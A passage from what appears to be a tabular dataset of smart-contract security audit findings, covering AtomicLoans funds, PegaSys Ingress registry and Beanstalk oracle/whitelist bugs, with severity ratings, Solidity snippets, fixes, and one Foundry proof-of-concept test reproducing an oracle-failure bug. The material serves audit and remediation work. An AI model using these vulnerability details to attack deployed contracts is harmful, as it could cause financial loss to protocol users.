themselves unable to do so without moving to a new Ethereum account.",Either allow funds to be deleted or allow funds to be switched between custom and non-custom.,,"```\\nfunction create(\\n uint256 maxLoanDur\\_,\\n uint256 maxFundDur\\_,\\n address arbiter\\_,\\n bool compoundEnabled\\_,\\n uint256 amount\\_\\n) external returns (bytes32 fund) {\\n require(fundOwner[msg.sender].lender != msg.sender || msg.sender == deployer); // Only allow one loan fund per address\\n```\\n" +Funds.maxFundDur has no effect if maxLoanDur is set,medium,"`Funds.maxFundDur` specifies the maximum amount of time a fund should be active. 
It's checked in `request()` to ensure the duration of the loan won't exceed that time, but the check is skipped if `maxLoanDur` is set:\\n```\\nif (maxLoanDur(fund) > 0) {\\n require(loanDur\\_ <= maxLoanDur(fund));\\n} else {\\n require(now + loanDur\\_ <= maxFundDur(fund));\\n}\\n```\\n\\nIf a user sets `maxLoanDur` (the maximum loan duration) to 1 week and sets the `maxFundDur` (timestamp when all loans should be complete) to December 1st, then there can actually be a loan that ends on December 7th.",Check against `maxFundDur` even when `maxLoanDur` is set.,,```\\nif (maxLoanDur(fund) > 0) {\\n require(loanDur\\_ <= maxLoanDur(fund));\\n} else {\\n require(now + loanDur\\_ <= maxFundDur(fund));\\n}\\n```\\n +Funds.update() lets users update fields that may not have any effect,low,"`Funds.update()` allows users to update the following fields which are only used if `bools[fund].custom` is set:\\n`minLoanAmt`\\n`maxLoanAmt`\\n`minLoanDur`\\n`interest`\\n`penalty`\\n`fee`\\n`liquidationRatio`\\nIf `bools[fund].custom` is not set, then these changes have no effect. 
This may be misleading to users.\\n```\\nfunction update(\\n bytes32 fund,\\n uint256 minLoanAmt\\_,\\n uint256 maxLoanAmt\\_,\\n uint256 minLoanDur\\_,\\n uint256 maxLoanDur\\_,\\n uint256 maxFundDur\\_,\\n uint256 interest\\_,\\n uint256 penalty\\_,\\n uint256 fee\\_,\\n uint256 liquidationRatio\\_,\\n address arbiter\\_\\n) external {\\n require(msg.sender == lender(fund));\\n funds[fund].minLoanAmt = minLoanAmt\\_;\\n funds[fund].maxLoanAmt = maxLoanAmt\\_;\\n funds[fund].minLoanDur = minLoanDur\\_;\\n funds[fund].maxLoanDur = maxLoanDur\\_;\\n funds[fund].maxFundDur = maxFundDur\\_;\\n funds[fund].interest = interest\\_;\\n funds[fund].penalty = penalty\\_;\\n funds[fund].fee = fee\\_;\\n funds[fund].liquidationRatio = liquidationRatio\\_;\\n funds[fund].arbiter = arbiter\\_;\\n}\\n```\\n",Resolution\\nThis is fixed in AtomicLoans/atomicloans-eth-contracts#67.\\nThis could be addressed by creating two update functions: one for custom funds and one for non-custom funds. Only the update for custom funds would allow setting these values.,,"```\\nfunction update(\\n bytes32 fund,\\n uint256 minLoanAmt\\_,\\n uint256 maxLoanAmt\\_,\\n uint256 minLoanDur\\_,\\n uint256 maxLoanDur\\_,\\n uint256 maxFundDur\\_,\\n uint256 interest\\_,\\n uint256 penalty\\_,\\n uint256 fee\\_,\\n uint256 liquidationRatio\\_,\\n address arbiter\\_\\n) external {\\n require(msg.sender == lender(fund));\\n funds[fund].minLoanAmt = minLoanAmt\\_;\\n funds[fund].maxLoanAmt = maxLoanAmt\\_;\\n funds[fund].minLoanDur = minLoanDur\\_;\\n funds[fund].maxLoanDur = maxLoanDur\\_;\\n funds[fund].maxFundDur = maxFundDur\\_;\\n funds[fund].interest = interest\\_;\\n funds[fund].penalty = penalty\\_;\\n funds[fund].fee = fee\\_;\\n funds[fund].liquidationRatio = liquidationRatio\\_;\\n funds[fund].arbiter = arbiter\\_;\\n}\\n```\\n" +Ingress.setContractAddress() can cause duplicate entries in contractKeys,medium,"`setContractAddress()` checks `ContractDetails` existence by inspecting 
`contractAddress`. A `contractAddress` of `0` means that the contract does not already exist, and its name must be added to contractKeys:\\n```\\nfunction setContractAddress(bytes32 name, address addr) public returns (bool) {\\n require(name > 0x0000000000000000000000000000000000000000000000000000000000000000, ""Contract name must not be empty."");\\n require(isAuthorized(msg.sender), ""Not authorized to update contract registry."");\\n\\n ContractDetails memory info = registry[name];\\n // create info if it doesn't exist in the registry\\n if (info.contractAddress == address(0)) {\\n info = ContractDetails({\\n owner: msg.sender,\\n contractAddress: addr\\n });\\n\\n // Update registry indexing\\n contractKeys.push(name);\\n } else {\\n info.contractAddress = addr;\\n }\\n // update record in the registry\\n registry[name] = info;\\n\\n emit RegistryUpdated(addr,name);\\n\\n return true;\\n}\\n```\\n\\nIf, however, a contract is actually added with the address `0`, which is currently allowed in the code, then the contract does already exists, and adding the name to `contractKeys` again will result in a duplicate.\\nMitigation\\nAn admin can call `removeContract` repeatedly with the same name to remove multiple duplicate entries.",Resolution\\nThis is fixed in PegaSysEng/[email protected]faff726.\\nEither disallow a contract address of `0` or check for existence via the `owner` field instead (which can never be 0).,,"```\\nfunction setContractAddress(bytes32 name, address addr) public returns (bool) {\\n require(name > 0x0000000000000000000000000000000000000000000000000000000000000000, ""Contract name must not be empty."");\\n require(isAuthorized(msg.sender), ""Not authorized to update contract registry."");\\n\\n ContractDetails memory info = registry[name];\\n // create info if it doesn't exist in the registry\\n if (info.contractAddress == address(0)) {\\n info = ContractDetails({\\n owner: msg.sender,\\n contractAddress: addr\\n });\\n\\n // Update registry 
indexing\\n contractKeys.push(name);\\n } else {\\n info.contractAddress = addr;\\n }\\n // update record in the registry\\n registry[name] = info;\\n\\n emit RegistryUpdated(addr,name);\\n\\n return true;\\n}\\n```\\n" +Use specific contract types instead of address where possible,low,"For clarity and to get more out of the Solidity type checker, it's generally preferred to use a specific contract type for variables rather than the generic `address`.\\n`AccountRules.ingressContractAddress` could instead be `AccountRules.ingressContract` and use the type IngressContract:\\n```\\naddress private ingressContractAddress;\\n```\\n\\n```\\nAccountIngress ingressContract = AccountIngress(ingressContractAddress);\\n```\\n\\n```\\nconstructor (address ingressAddress) public {\\n```\\n\\nThis same pattern is found in NodeRules:\\n```\\naddress private nodeIngressContractAddress;\\n```\\n","Where possible, use a specific contract type rather than `address`.",,```\\naddress private ingressContractAddress;\\n```\\n +Ingress should use a set,low,"The `AdminList`, `AccountRulesList`, and `NodeRulesList` contracts have been recently rewritten to use a set. `Ingress` has the semantics of a set but has not been written the same way.\\nThis leads to some inefficiencies. 
In particular, `Ingress.removeContract` is an O(n) operation:\\n```\\nfor (uint i = 0; i < contractKeys.length; i++) {\\n // Delete the key from the array + mapping if it is present\\n if (contractKeys[i] == name) {\\n delete registry[contractKeys[i]];\\n contractKeys[i] = contractKeys[contractKeys.length - 1];\\n delete contractKeys[contractKeys.length - 1];\\n contractKeys.length--;\\n```\\n",Use the same set implementation for Ingress: an array of `ContractDetails` and a mapping of names to indexes in that array.,,```\\nfor (uint i = 0; i < contractKeys.length; i++) {\\n // Delete the key from the array + mapping if it is present\\n if (contractKeys[i] == name) {\\n delete registry[contractKeys[i]];\\n contractKeys[i] = contractKeys[contractKeys.length - 1];\\n delete contractKeys[contractKeys.length - 1];\\n contractKeys.length--;\\n```\\n +ContractDetails.owner is never read,low,"The `ContractDetails` struct used by `Ingress` contracts has an `owner` field that is written to, but it is never read.\\n```\\nstruct ContractDetails {\\n address owner;\\n address contractAddress;\\n}\\n\\nmapping(bytes32 => ContractDetails) registry;\\n```\\n","Resolution\\nThis is fixed in PegaSysEng/[email protected]d3f505e.\\nIf `owner` is not (yet) needed, the `ContractDetails` struct should be removed altogether and the type of `Ingress.registry` should change to `mapping(bytes32 => address)`",,```\\nstruct ContractDetails {\\n address owner;\\n address contractAddress;\\n}\\n\\nmapping(bytes32 => ContractDetails) registry;\\n```\\n +[M-2] Failure in Maintaining Gauge Points,medium,"The defaultGaugePointFunction in the smart contract does not explicitly handle the scenario where the percentage of the Base Deposited Value (BDV) equals the optimal percentage (optimalPercentDepositedBdv), resulting in an unintended reduction of gauge points to 0 instead of maintaining their current value.\\nThe testnew_GaugePointAdjustment() test demonstrated this flaw by providing inputs where 
currentGaugePoints = 1189, optimalPercentDepositedBdv = 64, and percentOfDepositedBdv = 64, expecting newGaugePoints to equal currentGaugePoints. However, the outcome was newGaugePoints = 0, indicating an unexpected reduction to zero.\\n```\\nfunction testnew_GaugePointAdjustment() public {\\n uint256 currentGaugePoints = 1189; \\n uint256 optimalPercentDepositedBdv = 64; \\n uint256 percentOfDepositedBdv = 64; \\n\\n uint256 newGaugePoints = gaugePointFacet.defaultGaugePointFunction(\\n currentGaugePoints,\\n optimalPercentDepositedBdv,\\n percentOfDepositedBdv\\n );\\n\\n assertTrue(newGaugePoints <= MAX_GAUGE_POINTS, ""New gauge points exceed the maximum allowed"");\\n assertEq(newGaugePoints, currentGaugePoints, ""Gauge points adjustment does not match expected outcome"");\\n}\\n```\\n","Implement Explicit Returns: Ensure the defaultGaugePointFunction has an explicit return for the case where gauge points should not be adjusted. This can be achieved by adding a final return statement that simply returns currentGaugePoints if neither condition for incrementing nor decrementing is met, as shown below:\\n```\\nelse {\\n return currentGaugePoints; \\n}\\n```\\n","This behavior can lead to an undesired decrease in incentives for contract participants, potentially affecting participation and reward accumulation within the contract's ecosystem. 
Users may lose gauge points and, consequently, rewards due to a technical flaw rather than their actions.","```\\nfunction testnew_GaugePointAdjustment() public {\\n uint256 currentGaugePoints = 1189; \\n uint256 optimalPercentDepositedBdv = 64; \\n uint256 percentOfDepositedBdv = 64; \\n\\n uint256 newGaugePoints = gaugePointFacet.defaultGaugePointFunction(\\n currentGaugePoints,\\n optimalPercentDepositedBdv,\\n percentOfDepositedBdv\\n );\\n\\n assertTrue(newGaugePoints <= MAX_GAUGE_POINTS, ""New gauge points exceed the maximum allowed"");\\n assertEq(newGaugePoints, currentGaugePoints, ""Gauge points adjustment does not match expected outcome"");\\n}\\n```\\n" +Silo is not compatible with Fee-on-transfer or rebasing tokens,medium,"According to the documentation there are certain conditions that need to be met for a token to be whitelisted:\\n```\\nAdditional tokens may be added to the Deposit Whitelist via Beanstalk governance. In order for a token to be added to the Deposit Whitelist, Beanstalk requires:\\n1. The token address;\\n2. A function to calculate the Bean Denominated Value (BDV) of the token (see Section 14.2 of the whitepaper for complete formulas); and\\n3. The number of Stalk and Seeds per BDV received upon Deposit.\\n```\\n\\nThus if the community proposes any kind of Fee-on-Transfer or rebasing tokens like (PAXG or stETH) and the Beanstalk governance approves it, then the protocol needs to integrate them into the system. But as it is now the system is definitely not compatible with such tokens.\\n`deposit`, `depositWithBDV`, `addDepositToAccount`, `removeDepositFromAccount` and any other `silo` accounting related functions perform operations using inputed/recorded amounts. 
They don't query the existing balance of tokens before or after receiving/sending in order to properly account for tokens that shift balance when received (FoT) or shift balance over time (rebasing).",Clearly state in the docs that weird tokens won't be implemented via Governance Vote or adjust the code to check the `token.balanceOf()` before and after doing any operation related to the `silo`.,Likelihood - low/medium - At the moment of writing lido has over 31% of the ETH staked which makes `stETH` a very popular token. There's a strong chance that stakeholders would want to have `stETH` inside the silo.\\nOverall severity is medium.,"```\\nAdditional tokens may be added to the Deposit Whitelist via Beanstalk governance. In order for a token to be added to the Deposit Whitelist, Beanstalk requires:\\n1. The token address;\\n2. A function to calculate the Bean Denominated Value (BDV) of the token (see Section 14.2 of the whitepaper for complete formulas); and\\n3. The number of Stalk and Seeds per BDV received upon Deposit.\\n```\\n" +`removeWhitelistStatus` function Ignores updating `milestoneSeason` variable,medium,"The issue in the `LibWhitelistedTokens:removeWhitelistStatus` function is that it removes the Whitelist status of a token without considering the impact on other related variables, such as the `milestoneSeason` variable.\\n`milestoneSeason` is used in many functions for checking whether a token is whitelisted or not i.e.\\n```\\n require(s.ss[token].milestoneSeason == 0, ""Whitelist: Token already whitelisted"");\\n```\\n\\nIf the milestoneSeason variable is not updated or cleared when removing the Whitelist status, it may lead to incorrect behavior in subsequent checks or operations that rely on this variable.","To address this issue, ensure that related variables, such as `milestoneSeason`, are appropriately updated or cleared when removing the Whitelist status of a token. 
If the `milestoneSeason` variable is no longer relevant after removing the Whitelist status, it should be updated or cleared to maintain data integrity.","`removeWhitelistStatus` function Ignores updating `milestoneSeason` variable\\nRemoving the Whitelist status of a token without updating related variables can lead to inconsistencies in the data stored in the contract. The `milestoneSeason` variable, used for checking whitelist status in many functions, may still hold outdated or incorrect information after removing the status, potentially leading to unexpected behavior or vulnerabilities.","```\\n require(s.ss[token].milestoneSeason == 0, ""Whitelist: Token already whitelisted"");\\n```\\n" +No validation of total supply of unripe beans & Lp in `percentBeansRecapped` & `percentLPRecapped`,low,"`LibUnripe:percentBeansRecapped` & `LibUnripe:percentLPRecapped` functions calculate the percentage of Unripe Beans and Unripe LPs that have been recapitalized, respectively. These percentages are calculated based on the underlying balance of the Unripe Tokens and their total supply. 
There is no check if the `totalSupply` is zero which is used as division in the calculation.\\nSee the following code for both the functions:\\n```\\n /**\\n * @notice Returns the percentage that Unripe Beans have been recapitalized.\\n */\\n function percentBeansRecapped() internal view returns (uint256 percent) {\\n AppStorage storage s = LibAppStorage.diamondStorage();\\n return s.u[C.UNRIPE_BEAN].balanceOfUnderlying.mul(DECIMALS).div(C.unripeBean().totalSupply());\\n }\\n\\n /**\\n * @notice Returns the percentage that Unripe LP have been recapitalized.\\n */\\n function percentLPRecapped() internal view returns (uint256 percent) {\\n AppStorage storage s = LibAppStorage.diamondStorage();\\n return C.unripeLPPerDollar().mul(s.recapitalized).div(C.unripeLP().totalSupply());\\n }\\n```\\n","To handle this scenario, appropriate checks should be added to ensure that the `totalSupply` of Unripe Beans or LP tokens is non-zero before performing the division operation.","If the `totalSupply` in these two functions becomes zero, the calculation of the percentage of recapitalized Unripe Beans or LP tokens would result in a division by zero error. This is because of the denominator in the calculation. When the total supply is zero, dividing by zero is not defined in Solidity, and the contract would revert with an error.\\nThese functions are used widely across the different contracts at crucial places. 
So they will effect a lot of functionalities.",```\\n /**\\n * @notice Returns the percentage that Unripe Beans have been recapitalized.\\n */\\n function percentBeansRecapped() internal view returns (uint256 percent) {\\n AppStorage storage s = LibAppStorage.diamondStorage();\\n return s.u[C.UNRIPE_BEAN].balanceOfUnderlying.mul(DECIMALS).div(C.unripeBean().totalSupply());\\n }\\n\\n /**\\n * @notice Returns the percentage that Unripe LP have been recapitalized.\\n */\\n function percentLPRecapped() internal view returns (uint256 percent) {\\n AppStorage storage s = LibAppStorage.diamondStorage();\\n return C.unripeLPPerDollar().mul(s.recapitalized).div(C.unripeLP().totalSupply());\\n }\\n```\\n +Temperature and caseId are incorrectly adjusted when oracle fails,medium,"When user calls `gm` and the call for the chainlink oracle fails, it will return 0 for the `deltaB` value and this will cause a cascade effect, making the calculation of `caseId` = `3` and using the incorrect `caseId` to set up the new temperature on Weather.sol\\n```\\nfunction updateTemperature(int8 bT, uint256 caseId) private {\\n uint256 t = s.w.t;\\n if (bT < 0) {\\n if (t <= uint256(-bT)) {\\n // if (change < 0 && t <= uint32(-change)),\\n // then 0 <= t <= type(int8).max because change is an int8.\\n // Thus, downcasting t to an int8 will not cause overflow.\\n bT = 1 - int8(t);\\n s.w.t = 1;\\n } else {\\n s.w.t = uint32(t - uint256(-bT));\\n }\\n } else {\\n s.w.t = uint32(t + uint256(bT));\\n }\\n\\n emit TemperatureChange(s.season.current, caseId, bT);\\n }\\n```\\n\\nEvery consumer of the temperature on the protocol will be affected like:\\n`LibDibbler.morningTemperature`\\n`LibDibbler.beansToPods`\\n`LibDibbler.remainingPods`\\n`Sun.setSoilAbovePeg`\\n`Sun.stepSun`\\n`FieldFacet.maxTemperature`\\n`FieldFacet.totalSoil`\\n`FieldFacet._totalSoilAndTemperature`\\n`FieldFacet.sowWithMin\\n`gm` function uses the incorrect deltaB(0) to calculate the `caseId` which is then used to set the 
temperature.\\n```\\n function gm(address account, LibTransfer.To mode) public payable returns (uint256) {\\n int256 deltaB = stepOracle(); // @audit here if oracle failed, we update the season.timestamp and return deltaB zero here\\n uint256 caseId = calcCaseIdandUpdate(deltaB); // @audit caseId will be 3 here if deltaB is zero\\n LibGerminate.endTotalGermination(season, LibWhitelistedTokens.getWhitelistedTokens());\\n LibGauge.stepGauge();\\n stepSun(deltaB, caseId); // @audit wrong deltaB and caseId used here, setting the abovePeg to false and soil to zero\\n }\\n```\\n\\nPrepare the environment to work with Foundry + Updated Mocks https://gist.github.com/h0lydev/fcdb00c797adfdf8e4816031e095fd6c\\nMake sure to have the mainnet forked through Anvil: `anvil --fork-url https://rpc.ankr.com/eth`\\nCreate the `SeasonTemperature.t.sol` file under the folder `foundry` and paste the code below. Then run `forge test --match-contract SeasonTemperatureTest -vv`.\\n```\\n// SPDX-License-Identifier: MIT\\npragma solidity =0.7.6;\\npragma abicoder v2;\\n\\nimport { Sun } from ""contracts/beanstalk/sun/SeasonFacet/Sun.sol"";\\nimport { MockSeasonFacet } from ""contracts/mocks/mockFacets/MockSeasonFacet.sol"";\\nimport { MockSiloFacet } from ""contracts/mocks/mockFacets/MockSiloFacet.sol"";\\nimport { MockFieldFacet } from ""contracts/mocks/mockFacets/MockFieldFacet.sol"";\\nimport { MockWhitelistFacet } from ""contracts/mocks/mockFacets/MockWhitelistFacet.sol"";\\nimport {LibWhitelist} from ""contracts/libraries/Silo/LibWhitelist.sol"";\\nimport { Utils } from ""./utils/Utils.sol"";\\nimport ""./utils/TestHelper.sol"";\\nimport ""contracts/libraries/LibSafeMath32.sol"";\\nimport ""contracts/C.sol"";\\n\\ncontract SeasonTemperatureTest is MockSeasonFacet, TestHelper {\\n using SafeMath for uint256;\\n using LibSafeMath32 for uint32;\\n\\n bool oracleFailed;\\n \\n function setUp() public {\\n console.log(""diamondSetup"");\\n vm.createSelectFork('local');\\n oracleFailed = 
false;\\n setupDiamond();\\n dewhitelistCurvePool();\\n mintUnripeLPToUser1(); \\n mintUnripeBeanToUser1();\\n setOraclePrices(false, 1000e6, 1000e6, 1000e6);\\n _setReservesForWell(1000000e6, 1000e18);\\n \\n // user / tokens\\n mintTokenForUsers();\\n setTokenApprovalForUsers();\\n \\n enableFertilizerAndMintActiveFertilizers();\\n\\n callSunriseForUser1();\\n }\\n\\n\\n //////////// Setup functions ////////////\\n\\n function setTokenApprovalForUsers() internal { \\n approveTokensForUser(deployer);\\n approveTokensForUser(user1);\\n approveTokensForUser(user2);\\n approveTokensForUser(user3);\\n approveTokensForUser(user4);\\n approveTokensForUser(user5);\\n }\\n\\n function mintTokenForUsers() internal { \\n mintWETHtoUser(deployer);\\n mintWETHtoUser(user1);\\n mintWETHtoUser(user2);\\n mintWETHtoUser(user3);\\n mintWETHtoUser(user4);\\n mintWETHtoUser(user5);\\n\\n // mint C.bean() to users\\n C.bean().mint(deployer, 10e6);\\n C.bean().mint(user1, 10e6);\\n C.bean().mint(user2, 10e6);\\n C.bean().mint(user3, 10e6);\\n C.bean().mint(user4, 10e6);\\n C.bean().mint(user5, 10e6);\\n }\\n\\n function approveTokensForUser(address user) prank(user) internal { \\n mockWETH.approve(address(diamond), type(uint256).max);\\n unripeLP.approve(address(diamond), type(uint256).max);\\n unripeBean.approve(address(diamond), type(uint256).max);\\n well.approve(address(diamond), type(uint256).max);\\n C.bean().approve(address(field), type(uint256).max);\\n C.bean().approve(address(field), type(uint256).max);\\n }\\n\\n function dewhitelistCurvePool() public {\\n vm.prank(deployer);\\n whitelist.dewhitelistToken(C.CURVE_BEAN_METAPOOL);\\n }\\n\\n function mintWETHtoUser(address user) prank(user) internal {\\n mockWETH.mint(user, 1000e18);\\n }\\n\\n function mintUnripeLPToUser1() internal { \\n unripeLP.mint(user1, 1000e6);\\n }\\n\\n function mintUnripeBeanToUser1() internal { \\n unripeBean.mint(user1, 1000e6);\\n }\\n\\n function enableFertilizerAndMintActiveFertilizers() 
internal { \\n // second parameter is the unfertilizedIndex\\n fertilizer.setFertilizerE(true, 10000e6);\\n\\n vm.prank(deployer);\\n fertilizer.addFertilizerOwner(7500, 1e11, 99);\\n\\n vm.prank(deployer);\\n fertilizer.addFertilizerOwner(6200, 1e11, 99);\\n\\n addUnripeTokensToFacet();\\n }\\n\\n function addUnripeTokensToFacet() prank(deployer) internal { \\n unripe.addUnripeToken(C.UNRIPE_BEAN, C.BEAN, bytes32(0));\\n unripe.addUnripeToken(C.UNRIPE_LP, C.BEAN_ETH_WELL, bytes32(0));\\n }\\n\\n function callSunriseForUser1() prank(user1) internal {\\n _ensurePreConditions();\\n _advanceInTime(2 hours);\\n season.sunrise();\\n }\\n\\n function setOraclePrices(bool makeOracleFail, int256 chainlinkPrice, uint256 ethUsdtPrice, uint256 ethUsdcPrice) internal { \\n if (makeOracleFail) { \\n _addEthUsdPriceChainlink(0);\\n oracleFailed = true;\\n } else { \\n oracleFailed = false;\\n _addEthUsdPriceChainlink(chainlinkPrice);\\n _setEthUsdtPrice(ethUsdtPrice);\\n _setEthUsdcPrice(ethUsdcPrice);\\n }\\n }\\n\\n ////////////////////////////////////////// TESTS //////////////////////////////////////////\\n\\n function testWrongCalcId_whenOracleFails() public { \\n _prepareForAbovePeg();\\n _advanceInTime(1 hours);\\n uint256 _snapId = vm.snapshot();\\n \\n // When sunrise succeeds\\n vm.prank(user4);\\n season.sunrise();\\n\\n // Then print results\\n _printProtocolState();\\n assertEq(season.getT(), 5, ""when succeeds t should be 5"");\\n \\n // Then revert it to prepare for the season that will fail\\n vm.revertTo(_snapId);\\n\\n // Prepare for the season that will fail\\n setOraclePrices(true, 0, 0, 0);\\n\\n // When sunrise fails\\n vm.prank(user4);\\n season.sunrise();\\n\\n console.log(""Oracle failed, see results"");\\n _printProtocolState();\\n assertEq(season.getT(), 1, ""when succeeds t should be 1"");\\n\\n }\\n\\n function _printProtocolState() internal { \\n console.log(""-------------- Results --------------"");\\n console.log("""");\\n 
console.log(""thisSowTime: "", season.thisSowTime());\\n console.log(""lastSowTime: "", season.lastSowTime());\\n console.log(""getUsdTokenPrice: "", season.getUsdTokenPrice());\\n console.log(""getReserve0: "", season.getReserve0());\\n console.log(""getReserve1: "", season.getReserve1());\\n console.log(""getAbovePeg: "", season.getAbovePeg());\\n console.log(""getSoil: "", season.getSoil());\\n console.log(""lastDSoil: "", season.lastDSoil());\\n console.log(""s.w.t: "", season.getT());\\n console.log(""remaining pods: "", field.remainingPods());\\n } \\n\\n function _prepareForAbovePeg() internal { \\n season.mockSetSopWell(address(well));\\n season.captureWellE(address(well)); \\n season.setYieldE(5); // s.w.t\\n setOraclePrices(false, 1000e6, 1000e6, 1000e6);\\n\\n season.setLastSowTimeE(1);\\n season.setNextSowTimeE(10);\\n season.calcCaseIdE(1e18, 1);\\n season.setAbovePegE(true);\\n }\\n\\n ////////////////////////////////////////// HELPERS //////////////////////////////////////////\\n\\n function _ensurePreConditions() internal { \\n assertTrue(season.thisSowTime() == type(uint32).max, ""thisSowTime should be max"");\\n assertTrue(season.lastSowTime() == type(uint32).max, ""thisLastSowTime should be max"");\\n assertEq(season.getIsFarm(), 1, ""isFarm should be 1"");\\n assertEq(season.getUsdTokenPrice(), 1, ""usdTokenPrice should be 1"");\\n assertEq(season.getReserve0(), 1, ""reserve0 should be 1"");\\n assertEq(season.getReserve1(), 1, ""reserve1 should be 1"");\\n assertFalse(season.getAbovePeg(), ""pre - abovePeg should be false"");\\n assertEq(season.getSoil(), 0, ""soil should be == 0"");\\n }\\n}\\n```\\n\\nOutput:\\n```\\n handleRain caseId: 0\\n -------------- Results --------------\\n \\n thisSowTime: 4294967295\\n lastSowTime: 4294967295\\n getUsdTokenPrice: 1\\n getReserve0: 1\\n getReserve1: 1\\n getAbovePeg: false\\n getSoil: 462832752243\\n lastDSoil: 0\\n s.w.t: 5\\n remaining pods: 467461079765\\n\\nhandleRain caseId: 3\\n Oracle failed, 
see results\\n -------------- Results --------------\\n \\n thisSowTime: 4294967295\\n lastSowTime: 4294967295\\n getUsdTokenPrice: 1\\n getReserve0: 1\\n getReserve1: 1\\n getAbovePeg: false\\n getSoil: 0\\n lastDSoil: 0\\n s.w.t: 1\\n remaining pods: 0\\n\\nSuite result: ok. 1 passed; 0 failed; 0 skipped; finished in 29.45s (3.32ms CPU time)\\n```\\n\\nps: a console.log was added to the `handleRain` function to print the caseId.\\nResult: In a normal scenario the temperature would have remained at the value `5` but in this case was set to `1` and remaining pods/soil are also set to zero when in fact they should not.","It is noticed that the developers have the intention of never reverting the sunrise function to decrease the risk of depeg and breaking the incentive for users calling it. But at the same time, those state variables shouldn't be updated as if the system is working correctly because they will impact the next season as stated in this finding.\\nIt is tricky to propose a simple fix to the problem without impacting the system as a whole. Here are a few ideas that could be used:\\n(Recommended) An effective solution could be store the latest response from chainlink and in case it fails and the timeout(a limit that you can be added to accept a previous response from the oracle) is not reached yet, protocol could use the previous response. Liquity Protocol uses this approach, an example here: https://github.com/liquity/dev/blob/main/packages/contracts/contracts/PriceFeed.sol This solution will be effective for the protocol because the oracle is also called in different places like when minting fertilizers(getMintFertilizerOut), getting the well price(getRatiosAndBeanIndex), and `getConstantProductWell`. 
As the oracle is used along the protocol in many places, the `latest successful price` would be often up-to-date and within the limit time defined to use the previous price when the chainlink oracle fails.\\nAdditionally, consider handling the errors properly before updating the `deltaB` and `abovePeg` variables, as these disrupt the peg mechanism logic.","The interest rate will be wrongly decreased to 1, compromising the protocol peg mechanism when it needs to be maintained with a high interest rate/ temperature.\\nSow will be calculated with the lowest temperature, also compromising the peg mechanism due to the wrong exchange of Beans -> Sow -> Pods\\nRemaining pods function will return zero and users will have an inaccurate number representing their actual pods.","```\\nfunction updateTemperature(int8 bT, uint256 caseId) private {\\n uint256 t = s.w.t;\\n if (bT < 0) {\\n if (t <= uint256(-bT)) {\\n // if (change < 0 && t <= uint32(-change)),\\n // then 0 <= t <= type(int8).max because change is an int8.\\n // Thus, downcasting t to an int8 will not cause overflow.\\n bT = 1 - int8(t);\\n s.w.t = 1;\\n } else {\\n s.w.t = uint32(t - uint256(-bT));\\n }\\n } else {\\n s.w.t = uint32(t + uint256(bT));\\n }\\n\\n emit TemperatureChange(s.season.current, caseId, bT);\\n }\\n```\\n" +`Chainlink` oracle returns stale price due to `CHAINLINK_TIMEOUT` variable in `LibChainlinkOracle` being set to 4 hours,medium,"The `LibChainlinkOracle` library utilizes a `CHAINLINK_TIMEOUT` constant set to `14400` seconds (4 hours). 
This duration is four times longer than the `Chainlink` heartbeat that is `3600` seconds (1 hour), potentially introducing a significant delay in recognizing stale or outdated price data.\\nThe `LibChainlinkOracle::checkForInvalidTimestampOrAnswer` function accepts three input arguments: `timestamp`, `answer` and `currentTimestamp`, and checks if the returned `answer` from the `Chainlink Oracle` or the `timestamp` is invalid:\\n```\\n    function checkForInvalidTimestampOrAnswer(\\n        uint256 timestamp,\\n        int256 answer,\\n        uint256 currentTimestamp\\n    ) private pure returns (bool) {\\n        // Check for an invalid timeStamp that is 0, or in the future\\n        if (timestamp == 0 || timestamp > currentTimestamp) return true;\\n        // Check if Chainlink's price feed has timed out\\n        if (currentTimestamp.sub(timestamp) > CHAINLINK_TIMEOUT) return true;\\n        // Check for non-positive price\\n        if (answer <= 0) return true;\\n    }\\n```\\n\\nThe function also checks if the difference between the `currentTimestamp` and the `timestamp` is greater than `CHAINLINK_TIMEOUT`. The `CHAINLINK_TIMEOUT` is defined to be 4 hours:\\n```\\n    uint256 public constant CHAINLINK_TIMEOUT = 14400; // 4 hours: 60 * 60 * 4\\n```\\n","
Also, in volatile markets, a 4-hour window leads to accepting outdated prices, increasing the risk of price slippage.","```\\n function checkForInvalidTimestampOrAnswer(\\n uint256 timestamp,\\n int256 answer,\\n uint256 currentTimestamp\\n ) private pure returns (bool) {\\n // Check for an invalid timeStamp that is 0, or in the future\\n if (timestamp == 0 || timestamp > currentTimestamp) return true;\\n // Check if Chainlink's price feed has timed out\\n if (currentTimestamp.sub(timestamp) > CHAINLINK_TIMEOUT) return true;\\n // Check for non-positive price\\n if (answer <= 0) return true;\\n }\\n```\\n" +[M] DOS in LibChainlinkOracle when not considering phaseId,medium,"`LibChainlinkOracle` is not fully compatible with Chainlink's data model due to the lack of support for `phaseId and aggregatorRoundId`. Chainlink's `roundID` is a composite number combining a `phaseID and an aggregatorRoundID`.\\nThe `phaseID` changes whenever there is an upgrade to the underlying aggregator, and this change causes a significant jump in the `roundID` values due to the bit-shifting operation described in the documentation.\\nref here: https://docs.chain.link/data-feeds/historical-data#solidity\\nThe Beanstalk `LibChainlinkOracle` misinterprets the progression of `roundID` as sequential, overlooking Chainlink's unique bundling of `phaseId` and `aggregatorRoundId`. With the advancement of `phaseID`, there's an exponential increase in `roundID` by 2^64, leading to a temporal suspension until a new interval commences. This will instigate a denial-of-service scenario. 
The `getEthUsdTwap and getEthUsdPrice` functions are particularly susceptible to this vulnerability, as they rely on accurate TWAP values for their computations, which effects for example any calls reliant on Oracle data.\\n```\\nfunction getRoundData(uint80 _roundId)\\n public\\n view\\n virtual\\n override\\n returns (\\n uint80 roundId,\\n int256 answer,\\n uint256 startedAt,\\n uint256 updatedAt,\\n uint80 answeredInRound\\n )\\n {\\n (uint16 phaseId, uint64 aggregatorRoundId) = parseIds(_roundId);\\n\\n (\\n uint80 roundId,\\n int256 answer,\\n uint256 startedAt,\\n uint256 updatedAt,\\n uint80 ansIn\\n ) = phaseAggregators[phaseId].getRoundData(aggregatorRoundId);\\n\\n return addPhaseIds(roundId, answer, startedAt, updatedAt, ansIn, phaseId);\\n }\\n```\\n\\n```\\n function latestRoundData()\\n public\\n view\\n virtual\\n override\\n returns (\\n uint80 roundId,\\n int256 answer,\\n uint256 startedAt,\\n uint256 updatedAt,\\n uint80 answeredInRound\\n )\\n {\\n Phase memory current = currentPhase; // cache storage reads\\n\\n (\\n uint80 roundId,\\n int256 answer,\\n uint256 startedAt,\\n uint256 updatedAt,\\n uint80 ansIn\\n ) = current.aggregator.latestRoundData();\\n\\n return addPhaseIds(roundId, answer, startedAt, updatedAt, ansIn, current.id);\\n 